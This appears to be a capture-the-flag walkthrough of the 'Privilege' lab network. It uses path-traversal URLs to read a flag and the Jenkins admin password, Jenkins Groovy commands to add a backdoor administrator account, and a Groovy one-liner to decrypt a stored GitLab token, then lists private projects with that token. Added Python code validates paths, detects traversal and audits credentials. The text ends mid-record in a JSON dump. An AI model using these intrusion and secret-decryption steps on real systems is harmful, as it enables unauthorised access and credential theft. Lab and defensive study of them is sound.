Privilege - 春秋云镜

Information gathering

First, look at the scan results.

Not much there, just two web services. Given the hint, let's scan for directories.

There is a source archive; download it and audit it.

Arbitrary file read

First read the flag, then read the other site's password.

http://39.98.114.207/tools/content-log.php?logfile=../../../../../../../../../Users/Administrator/flag/flag01.txt
http://39.98.114.207/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword
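The `logfile` parameter is used as a path with no validation at all, which is what makes both reads above possible. As an added example (not code from the page or from the challenge), here is how such a log viewer should validate that parameter, plus a small detector that flags these requests in a web-server access log. The log directory, the access-log format and the client addresses are assumptions.

```python
import os
import re
from pathlib import PurePosixPath, PureWindowsPath
from urllib.parse import parse_qs, urlsplit

# Directory the log viewer is allowed to read from (assumed location for this example).
LOG_DIR = "/var/www/html/logs"
# A bare file name with a log-style extension; no separators, no leading dot.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*\.(log|txt)")


def is_safe_logfile(logfile: str) -> bool:
    """Accept only a plain file name that must live inside LOG_DIR."""
    if not logfile or "\x00" in logfile:
        return False
    # Absolute paths on either platform: /etc/passwd, C:\ProgramData\..., \\server\share.
    if PurePosixPath(logfile).is_absolute() or PureWindowsPath(logfile).is_absolute():
        return False
    if PureWindowsPath(logfile).drive:
        return False
    # Any separator at all means the caller is trying to leave the directory.
    if "/" in logfile or "\\" in logfile:
        return False
    return _SAFE_NAME.fullmatch(logfile) is not None


def resolve_logfile(logfile: str, log_dir: str = LOG_DIR):
    """Return the canonical path to open, or None when the request must be refused."""
    if not is_safe_logfile(logfile):
        return None
    base = os.path.realpath(log_dir)
    full = os.path.realpath(os.path.join(base, logfile))
    # Defence in depth: re-check containment after symlink resolution.
    if os.path.commonpath([base, full]) != base:
        return None
    return full


def find_traversal_requests(access_log_lines):
    """Return (client, logfile) pairs whose logfile parameter fails validation."""
    hits = []
    for line in access_log_lines:
        parts = line.split()
        if len(parts) < 7:
            continue
        client, request_path = parts[0], parts[6]
        for value in parse_qs(urlsplit(request_path).query).get("logfile", []):
            if not is_safe_logfile(value):
                hits.append((client, value))
    return hits


# Constructed web-server access-log lines (clients and timestamps are made up);
# the two flagged requests carry the logfile values used above.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2025:19:00:01 +0800] "GET /tools/content-log.php?logfile=access.log HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Mar/2025:19:00:07 +0800] "GET /tools/content-log.php?logfile=../../../../../../../../../Users/Administrator/flag/flag01.txt HTTP/1.1" 200 40',
    '10.0.0.9 - - [10/Mar/2025:19:00:09 +0800] "GET /tools/content-log.php?logfile=C:\\ProgramData\\Jenkins\\.jenkins\\secrets\\initialAdminPassword HTTP/1.1" 200 33',
]

if __name__ == "__main__":
    for client, value in find_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {value}")
```

The name check alone would be enough for the two requests shown; the `realpath` containment test is there so that a symlink dropped into the log directory cannot reopen the hole later.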

Then log in to the other site's admin panel and take a look.

Jenkins backend RCE

Jenkins has a place where commands can be executed.

It runs with high privileges, so add a backdoor user and RDP in to take a look.

println "net user oceanz admin@123 /add".execute().text 
println "net localgroup administrators oceanz /add".execute().text

Internal network penetration

First scan the internal network, and set up a proxy along the way to make the later steps easier.

  / _ \     ___  ___ _ __ __ _  ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.14.7 is alive
(icmp) Target 172.22.14.11 is alive
(icmp) Target 172.22.14.16 is alive
(icmp) Target 172.22.14.31 is alive
(icmp) Target 172.22.14.46 is alive
[*] Icmp alive hosts len is: 5
172.22.14.7:3306 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.11:445 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:445 open
172.22.14.31:139 open
172.22.14.46:139 open
172.22.14.11:139 open
172.22.14.31:135 open
172.22.14.46:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] WebTitle http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] NetBios 172.22.14.11 [+] DC:XIAORANG\XR-DC
[*] NetInfo
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] WebTitle http://172.22.14.7:8080 code:403 len:548 title:None
[*] WebTitle http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] NetInfo
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] NetBios 172.22.14.46 XIAORANG\XR-0923
[*] NetBios 172.22.14.31 WORKGROUP\XR-ORACLE
[*] NetInfo
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] WebTitle http://172.22.14.7 code:200 len:54603 title:XR SHOP
[*] WebTitle http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
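The fscan output above is exactly what a defender gets from an internal sweep as well. As an added example (not part of the original writeup) here is a parser that turns it into a per-host inventory and lists the exposures worth reviewing: the domain controller, SMB/RPC on every Windows host, and the database listeners. The parser and the watched-port table are my own; the sample input is the fscan output shown above.

```python
import re
from collections import defaultdict

_ALIVE = re.compile(r"^\(icmp\) Target (\S+) is alive$")
_PORT = re.compile(r"^(\d+\.\d+\.\d+\.\d+):(\d+) open$")
_NETBIOS = re.compile(r"^\[\*\] NetBios (\S+) (\[\+\] DC:)?(\S+)$")
_TITLE = re.compile(r"^\[\*\] WebTitle (\S+) code:(\d+) len:\d+ title:(.*)$")

# Services whose exposure inside the segment deserves a second look (my selection).
WATCHED_PORTS = {
    22: "SSH", 88: "Kerberos", 135: "RPC endpoint mapper", 445: "SMB",
    1521: "Oracle listener", 3306: "MySQL", 8080: "Jenkins/alt HTTP",
}


def parse_fscan(text):
    """Return {ip: {"ports": set, "netbios": str|None, "is_dc": bool, "web": [(url, code, title)]}}."""
    hosts = defaultdict(lambda: {"ports": set(), "netbios": None, "is_dc": False, "web": []})
    for raw in text.splitlines():
        line = raw.strip()
        if m := _ALIVE.match(line):
            hosts[m.group(1)]  # creating the entry records the host as alive
        elif m := _PORT.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := _NETBIOS.match(line):
            hosts[m.group(1)]["netbios"] = m.group(3)
            hosts[m.group(1)]["is_dc"] = m.group(2) is not None
        elif m := _TITLE.match(line):
            url, code, title = m.group(1), int(m.group(2)), m.group(3)
            ip = re.match(r"https?://([^:/]+)", url).group(1)
            hosts[ip]["web"].append((url, code, title))
    return dict(hosts)


def exposure_report(hosts):
    """One note per watched service per host, plus a marker for domain controllers."""
    notes = []
    for ip in sorted(hosts, key=lambda a: tuple(int(x) for x in a.split("."))):
        info = hosts[ip]
        label = info["netbios"] or ip
        if info["is_dc"]:
            notes.append(f"{ip} ({label}) is a domain controller")
        for port in sorted(info["ports"] & set(WATCHED_PORTS)):
            notes.append(f"{ip} ({label}) exposes {WATCHED_PORTS[port]} on {port}")
    return notes


# The fscan output from the scan above (banner omitted).
FSCAN_OUTPUT = r"""
(icmp) Target 172.22.14.7 is alive
(icmp) Target 172.22.14.11 is alive
(icmp) Target 172.22.14.16 is alive
(icmp) Target 172.22.14.31 is alive
(icmp) Target 172.22.14.46 is alive
172.22.14.7:3306 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.11:445 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:445 open
172.22.14.31:139 open
172.22.14.46:139 open
172.22.14.11:139 open
172.22.14.31:135 open
172.22.14.46:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] WebTitle http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] NetBios 172.22.14.11 [+] DC:XIAORANG\XR-DC
[*] WebTitle http://172.22.14.7:8080 code:403 len:548 title:None
[*] WebTitle http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] NetBios 172.22.14.46 XIAORANG\XR-0923
[*] NetBios 172.22.14.31 WORKGROUP\XR-ORACLE
[*] WebTitle http://172.22.14.7 code:200 len:54603 title:XR SHOP
[*] WebTitle http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
"""

if __name__ == "__main__":
    for note in exposure_report(parse_fscan(FSCAN_OUTPUT)):
        print(note)
```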

The hint for the second flag mentions a GitLab API token, so let's dig through the configuration files.

<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0">
<scope>GLOBAL</scope>
<id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
<description></description>
<apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
</com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

This apiToken needs to be decrypted.

println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
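Anyone who can read `credentials.xml` and run Groovy on the controller can decrypt every stored secret this way, so a defender wants to know what is stored there and how widely it is scoped. As an added example (not code from the page or from Jenkins) here is a small audit helper that inventories the credential entries in a `credentials.xml` without decrypting anything, and flags entries that are GLOBAL-scoped or undocumented. The sample input is the file fragment shown above; the review rules are my own.

```python
import re
import xml.etree.ElementTree as ET

# Jenkins writes encrypted secrets as "{base64}"; this matches that envelope.
_ENCRYPTED = re.compile(r"^\{[A-Za-z0-9+/=]+\}$")

# The credentials.xml fragment from the page, embedded as the sample input.
SAMPLE_CREDENTIALS_XML = """<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0">
          <scope>GLOBAL</scope>
          <id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
          <description></description>
          <apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
        </com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
"""


def inventory_credentials(xml_text):
    """List every credential entry: class, plugin, id, scope, description, encrypted fields."""
    # Drop the XML declaration so the parser is not asked to honour the 1.1 version string.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text).strip()
    root = ET.fromstring(body)
    found = []
    for entry in root.iter("entry"):
        creds = entry.find("java.util.concurrent.CopyOnWriteArrayList")
        if creds is None:
            continue
        for cred in creds:
            secret_fields = [c.tag for c in cred if c.text and _ENCRYPTED.match(c.text.strip())]
            found.append({
                "class": cred.tag,
                "plugin": cred.get("plugin", ""),
                "id": (cred.findtext("id") or "").strip(),
                "scope": (cred.findtext("scope") or "").strip(),
                "description": (cred.findtext("description") or "").strip(),
                "secret_fields": secret_fields,
            })
    return found


def review(found):
    """Notes a reviewer would raise: broad scope and missing ownership information."""
    notes = []
    for c in found:
        if c["scope"] == "GLOBAL":
            notes.append(f"{c['id']}: GLOBAL scope, usable by every job and pipeline on this controller")
        if not c["description"]:
            notes.append(f"{c['id']}: no description, owner and purpose unknown")
    return notes


if __name__ == "__main__":
    entries = inventory_credentials(SAMPLE_CREDENTIALS_XML)
    for e in entries:
        print(e["id"], e["class"], e["scope"], e["secret_fields"])
    for note in review(entries):
        print("review:", note)
```

The point of the inventory is to decide what to rotate after an incident like this one: every entry with an encrypted field must be treated as exposed once the controller's `secrets/` directory and script console were reachable.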

Then use the API to list the projects in GitLab and look for the Oracle password.

./proxychains4 -f proxychains.conf  curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"

Output:


[
  {
    "id": 6,
    "description": null,
    "name": "Internal Secret",
    "name_with_namespace": "XRLAB / Internal Secret",
    "path": "internal-secret",
    "path_with_namespace": "xrlab/internal-secret",
    "created_at": "2022-12-25T08:30:12.362Z",
    "default_branch": "main",
    "tag_list": [ ],
    "topics": [ ],
    "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
    "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
    "web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
    "readme_url": null,
    "avatar_url": null,
    "forks_count": 0,
    "star_count": 0,
    "last_activity_at": "2022-12-25T08:30:12.362Z",
    "namespace": {
      "id": 8,
      "name": "XRLAB",
      "path": "xrlab",
      "kind": "group",
      "full_path": "xrlab",
      "parent_id": null,
      "avatar_url": null,
      "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
    },
    "_links": {
      "self": "http://gitlab.xiaorang.lab/api/v4/projects/6",
      "issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues",
      "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests",
      "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches",
      "labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels",
      "events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events",
      "members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members",
      "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"
    },
    "packages_enabled": true,
    "empty_repo": false,
    "archived": false,
    "visibility": "private",
    "resolve_outdated_diff_discussions": false,
    "container_expiration_policy": {
      "cadence": "1d",
      "enabled": false,
      "keep_n": 10,
      "older_than": "90d",
      "name_regex": ".*",
      "name_regex_keep": null,
      "next_run_at": "2022-12-26T08:30:12.373Z"
    },
    "issues_enabled": true,
    "merge_requests_enabled": true,
    "wiki_enabled": true,
    "jobs_enabled": true,
    "snippets_enabled": true,
    "container_registry_enabled": true,
    "service_desk_enabled": false,
    "service_desk_address": null,
    "can_create_merge_request_in": true,
    "issues_access_level": "enabled",
    "repository_access_level": "enabled",
    "merge_requests_access_level": "enabled",
    "forking_access_level": "enabled",
    "wiki_access_level": "enabled",
    "builds_access_level": "enabled",
    "snippets_access_level": "enabled",
    "pages_access_level": "private",
    "operations_access_level": "enabled",
    "analytics_access_level": "enabled",
    "container_registry_access_level": "enabled",
    "security_and_compliance_access_level": "private",
    "releases_access_level": "enabled",
    "environments_access_level": "enabled",
    "feature_flags_access_level": "enabled",
    "infrastructure_access_level": "enabled",
    "monitor_access_level": "enabled",
    "emails_disabled": null,
    "shared_runners_enabled": true,
    "lfs_enabled": true,
    "creator_id": 2,
    "import_url": null,
    "import_type": null,
    "import_status": "none",
    "open_issues_count": 0,
    "ci_default_git_depth": 20,
    "ci_forward_deployment_enabled": true,
    "ci_job_token_scope_enabled": false,
    "ci_separated_caches": true,
    "ci_opt_in_jwt": false,
    "ci_allow_fork_pipelines_to_run_in_parent_project": true,
    "public_jobs": true,
    "build_timeout": 3600,
    "auto_cancel_pending_pipelines": "enabled",
    "ci_config_path": null,
    "shared_with_groups": [ ],
    "only_allow_merge_if_pipeline_succeeds": false,
    "allow_merge_on_skipped_pipeline": null,
    "restrict_user_defined_variables": false,
    "request_access_enabled": true,
    "only_allow_merge_if_all_discussions_are_resolved": false,
    "remove_source_branch_after_merge": true,
    "printing_merge_request_link_enabled": true,
    "merge_method": "merge",
    "squash_option": "default_off",
    "enforce_auth_checks_on_uploads": true,
    "suggestion_commit_message": null,
    "merge_commit_template": null,
    "squash_commit_template": null,
    "issue_branch_template": null,
    "auto_devops_enabled": true,
    "auto_devops_deploy_strategy": "continuous",
    "autoclose_referenced_issues": true,
    "keep_latest_artifact": true,
    "runner_token_expiration_interval": null,
    "permissions": {
      "project_access": null,
      "group_access": {
        "access_level": 50,
        "notification_level": 3
      }
    }
  },
  {
    "id": 4,
    "description": null,
    "name": "XRAdmin",
    "name_with_namespace": "XRLAB / XRAdmin",
    "path": "xradmin",
    "path_with_namespace": "xrlab/xradmin",
    "created_at": "2022-12-25T07:48:16.751Z",
    "default_branch": "main",
    "tag_list": [ ],
    "topics": [ ],
    "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
    "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
    "web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
    "readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
    "avatar_url": null,
    "forks_count": 0,
    "star_count": 0,
    "last_activity_at": "2023-05-30T10:27:31.762Z",
    "namespace": {
      "id": 8,
      "name": "XRLAB",
      "path": "xrlab",
      "kind": "group",
      "full_path": "xrlab",
      "parent_id": null,
      "avatar_url": null,
      "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
    },
    "_links": {
      "self": "http://gitlab.xiaorang.lab/api/v4/projects/4",
      "issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues",
      "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests",
      "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches",
      "labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels",
      "events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events",
      "members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members",
      "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"
    },
    "packages_enabled": true,
    "empty_repo": false,
    "archived": false,
    "visibility": "private",
    "resolve_outdated_diff_discussions": false,
    "container_expiration_policy": {
      "cadence": "1d",
      "enabled": false,
      "keep_n": 10,
      "older_than": "90d",
      "name_regex": ".*",
      "name_regex_keep": null,
      "next_run_at": "2022-12-26T07:48:16.788Z"
    },
    "issues_enabled": true,
    "merge_requests_enabled": true,
    "wiki_enabled": true,
    "jobs_enabled": true,
    "snippets_enabled": true,
    "container_registry_enabled": true,
    "service_desk_enabled": false,
    "service_desk_address": null,
    "can_create_merge_request_in": true,
    "issues_access_level": "enabled",
    "repository_access_level": "enabled",
    "merge_requests_access_level": "enabled",
    "forking_access_level": "enabled",
    "wiki_access_level": "enabled",
    "builds_access_level": "enabled",
    "snippets_access_level": "enabled",
    "pages_access_level": "private",
    "operations_access_level": "enabled",
    "analytics_access_level": "enabled",
    "container_registry_access_level": "enabled",
    "security_and_compliance_access_level": "private",
    "releases_access_level": "enabled",
    "environments_access_level": "enabled",
    "feature_flags_access_level": "enabled",
    "infrastructure_access_level": "enabled",
    "monitor_access_level": "enabled",
    "emails_disabled": null,
    "shared_runners_enabled": true,
    "lfs_enabled": true,
    "creator_id": 2,
    "import_url": null,
    "import_type": null,
    "import_status": "none",
    "open_issues_count": 0,
    "ci_default_git_depth": 20,
    "ci_forward_deployment_enabled": true,
    "ci_job_token_scope_enabled": false,
    "ci_separated_caches": true,
    "ci_opt_in_jwt": false,
    "ci_allow_fork_pipelines_to_run_in_parent_project": true,
    "public_jobs": true,
    "build_timeout": 3600,
    "auto_cancel_pending_pipelines": "enabled",
    "ci_config_path": null,
    "shared_with_groups": [ ],
    "only_allow_merge_if_pipeline_succeeds": false,
    "allow_merge_on_skipped_pipeline": null,
    "restrict_user_defined_variables": false,
    "request_access_enabled": true,
    "only_allow_merge_if_all_discussions_are_resolved": false,
    "remove_source_branch_after_merge": true,
    "printing_merge_request_link_enabled": true,
    "merge_method": "merge",
    "squash_option": "default_off",
    "enforce_auth_checks_on_uploads": true,
    "suggestion_commit_message": null,
    "merge_commit_template": null,
    "squash_commit_template": null,
    "issue_branch_template": null,
    "auto_devops_enabled": false,
    "auto_devops_deploy_strategy": "continuous",
    "autoclose_referenced_issues": true,
    "keep_latest_artifact": true,
    "runner_token_expiration_interval": null,
    "permissions": {
      "project_access": null,
      "group_access": {
        "access_level": 50,
        "notification_level": 3
      }
    }
  },
  {
    "id": 3,
    "description": null,
    "name": "Awenode",
    "name_with_namespace": "XRLAB / Awenode",
    "path": "awenode",
    "path_with_namespace": "xrlab/awenode",
    "created_at": "2022-12-25T07:46:43.635Z",
    "default_branch": "master",
    "tag_list": [ ],
    "topics": [ ],
    "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
    "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
    "web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
    "readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
    "avatar_url": null,
    "forks_count": 0,
    "star_count": 0,
    "last_activity_at": "2022-12-25T07:46:43.635Z",
    "namespace": {
      "id": 8,
      "name": "XRLAB",
      "path": "xrlab",
      "kind": "group",
      "full_path": "xrlab",
      "parent_id": null,
      "avatar_url": null,
      "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
    },
    "_links": {
      "self": "http://gitlab.xiaorang.lab/api/v4/projects/3",
      "issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues",
      "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests",
      "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches",
      "labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels",
      "events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events",
      "members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members",
      "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"
    },
    "packages_enabled": true,
    "empty_repo": false,
    "archived": false,
    "visibility": "private",
    "resolve_outdated_diff_discussions": false,
    "container_expiration_policy": {
      "cadence": "1d",
      "enabled": false,
      "keep_n": 10,
      "older_than": "90d",
      "name_regex": ".*",
      "name_regex_keep": null,
      "next_run_at": "2022-12-26T07:46:44.614Z"
    },
    "issues_enabled": true,
    "merge_requests_enabled": true,
    "wiki_enabled": true,
    "jobs_enabled": true,
    "snippets_enabled": true,
    "container_registry_enabled": true,
    "service_desk_enabled": false,
    "service_desk_address": null,
    "can_create_merge_request_in": true,
    "issues_access_level": "enabled",
    "repository_access_level": "enabled",
    "merge_requests_access_level": "enabled",
    "forking_access_level": "enabled",
    "wiki_access_level": "enabled",
    "builds_access_level": "enabled",
    "snippets_access_level": "enabled",
    "pages_access_level": "private",
    "operations_access_level": "enabled",
    "analytics_access_level": "enabled",
    "container_registry_access_level": "enabled",
    "security_and_compliance_access_level": "private",
    "releases_access_level": "enabled",
    "environments_access_level": "enabled",
    "feature_flags_access_level": "enabled",
    "infrastructure_access_level": "enabled",
    "monitor_access_level": "enabled",
    "emails_disabled": null,
    "shared_runners_enabled": true,
    "lfs_enabled": true,
    "creator_id": 2,
    "import_url": null,
    "import_type": "gitlab_project",
    "import_status": "finished",
    "open_issues_count": 0,
    "ci_default_git_depth": 20,
    "ci_forward_deployment_enabled": true,
    "ci_job_token_scope_enabled": false,
    "ci_separated_caches": true,
    "ci_opt_in_jwt": false,
    "ci_allow_fork_pipelines_to_run_in_parent_project": true,
    "public_jobs": true,
    "build_timeout": 3600,
    "auto_cancel_pending_pipelines": "enabled",
    "ci_config_path": null,
    "shared_with_groups": [ ],
    "only_allow_merge_if_pipeline_succeeds": false,
    "allow_merge_on_skipped_pipeline": null,
    "restrict_user_defined_variables": false,
    "request_access_enabled": true,
    "only_allow_merge_if_all_discussions_are_resolved": false,
    "remove_source_branch_after_merge": true,
    "printing_merge_request_link_enabled": true,
    "merge_method": "merge",
    "squash_option": "default_off",
    "enforce_auth_checks_on_uploads": true,
    "suggestion_commit_message": null,
    "merge_commit_template": null,
    "squash_commit_template": null,
    "issue_branch_template": null,
    "auto_devops_enabled": true,
    "auto_devops_deploy_strategy": "continuous",
    "autoclose_referenced_issues": true,
    "keep_latest_artifact": true,
    "runner_token_expiration_interval": null,
    "permissions": {
      "project_access": {
        "access_level": 40,
        "notification_level": null
      },
      "group_access": {
        "access_level": 50,
        "notification_level": 3
      }
    }
  },
  {
    "id": 2,
    "description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
    "name": "XRWiki",
    "name_with_namespace": "XRLAB / XRWiki",
    "path": "xrwiki",
    "path_with_namespace": "xrlab/xrwiki",
    "created_at": "2022-12-25T07:44:18.589Z",
    "default_branch": "master",
    "tag_list": [ ],
    "topics": [ ],
    "ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
    "http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
    "web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
    "readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
    "avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
    "forks_count": 0,
    "star_count": 0,
    "last_activity_at": "2022-12-25T07:44:18.589Z",
    "namespace": {
      "id": 8,
      "name": "XRLAB",
      "path": "xrlab",
      "kind": "group",
      "full_path": "xrlab",
      "parent_id": null,
      "avatar_url": null,
      "web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
    },
    "_links": {
      "self": "http://gitlab.xiaorang.lab/api/v4/projects/2",
      "issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues",
      "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests",
      "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches",
      "labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels",
      "events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events",
      "members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members",
      "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"
    },
    "packages_enabled": true,
    "empty_repo": false,
    "archived": false,
    "visibility": "private",
    "resolve_outdated_diff_discussions": null,
    "container_expiration_policy": {
      "cadence": "1d",
      "enabled": false,
      "keep_n": 10,
      "older_than": "90d",
      "name_regex": ".*",
      "name_regex_keep": null,
      "next_run_at": "2022-12-26T07:44:18.627Z"
    },
    "issues_enabled": true,
    "merge_requests_enabled": true,
    "wiki_enabled": false,
    "jobs_enabled": true,
    "snippets_enabled": false,
    "container_registry_enabled": false,
    "service_desk_enabled": false,
    "service_desk_address": null,
    "can_create_merge_request_in": true,
    "issues_access_level": "enabled",
    "repository_access_level": "enabled",
    "merge_requests_access_level": "enabled",
    "forking_access_level": "enabled",
    "wiki_access_level": "disabled",
    "builds_access_level": "enabled",
    "snippets_access_level": "disabled",
    "pages_access_level": "public",
    "operations_access_level": "enabled",
    "analytics_access_level": "enabled",
    "container_registry_access_level": "disabled",
    "security_and_compliance_access_level": "private",
    "releases_access_level": "enabled",
    "environments_access_level": "enabled",
    "feature_flags_access_level": "enabled",
    "infrastructure_access_level": "enabled",
    "monitor_access_level": "enabled",
    "emails_disabled": null,
    "shared_runners_enabled": true,
    "lfs_enabled": true,
    "creator_id": 2,
    "import_url": null,
    "import_type": "gitlab_project",
    "import_status": "finished",
    "open_issues_count": 0,
    "ci_default_git_depth": 20,
    "ci_forward_deployment_enabled": true,
    "ci_job_token_scope_enabled": false,
    "ci_separated_caches": true,
    "ci_opt_in_jwt": false,
    "ci_allow_fork_pipelines_to_run_in_parent_project": true,
    "public_jobs": true,
    "build_timeout": 3600,
    "auto_cancel_pending_pipelines": "enabled",
    "ci_config_path": null,
    "shared_with_groups": [ ],
    "only_allow_merge_if_pipeline_succeeds": false,
    "allow_merge_on_skipped_pipeline": null,
    "restrict_user_defined_variables": false,
    "request_access_enabled": false,
    "only_allow_merge_if_all_discussions_are_resolved": false,
    "remove_source_branch_after_merge": true,
    "printing_merge_request_link_enabled": true,
    "merge_method": "merge",
    "squash_option": "default_off",
    "enforce_auth_checks_on_uploads": true,
    "suggestion_commit_message": null,
    "merge_commit_template": null,
    "squash_commit_template": null,
    "issue_branch_template": null,
    "auto_devops_enabled": true,
    "auto_devops_deploy_strategy": "continuous",
    "autoclose_referenced_issues": true,
    "keep_latest_artifact": true,
    "runner_token_expiration_interval": null,
    "permissions": {
      "project_access": {
        "access_level": 40,
        "notification_level": null
      },
      "group_access": {
        "access_level": 50,
        "notification_level": 3
      }
    }
  },
  {
    "id": 1,
